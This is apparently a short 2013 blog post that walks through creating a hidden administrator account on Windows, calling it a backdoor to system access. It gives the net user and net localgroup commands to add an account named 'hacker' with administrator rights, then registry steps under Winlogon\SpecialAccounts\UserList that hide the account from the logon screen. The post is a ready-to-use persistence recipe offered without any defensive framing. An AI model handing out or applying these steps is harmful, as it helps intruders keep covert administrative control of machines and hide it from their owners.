Friday 2 August 2013

Create Hidden account or Hide existing account in Windows, a Backdoor to System Access

This post is to show you, how we can create an invisible or hidden account in any Windows OS, so that it is not visible at the log on screen.

Here we go>>>
  1. Open command prompt as administrator.
  2. Create an account using command: net user hacker /add
  3. Set password to this account using command: net user hacker *
  4. Type password for your account twice.
  5. Now, add this account to administrators group so that we can have full rights on system using command: net localgroup administrators hacker /add
  6. Now Open Registry Editor by typing regedit in Run window
  7. Go to HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/Current Version/Winlogon
  8. Now create new subkey SpecialAccounts to Winlogon by right click on Winlogon, select New, then select Key.
  9. Now create new subkey UserList  to SpecialAccounts by right click on SpecialAccounts.
  10. Now right click on UserList, go to New, then DWORD (32bit) Value.
  11. Name it Hacker or the user account name you want to hide.
  12. Double click on the Hacker or DWORD value just created and set value data to 0 to hide account.
  13. If you want to display account, set Value data to 1 or delete the DWORD value.


No comments:

Post a Comment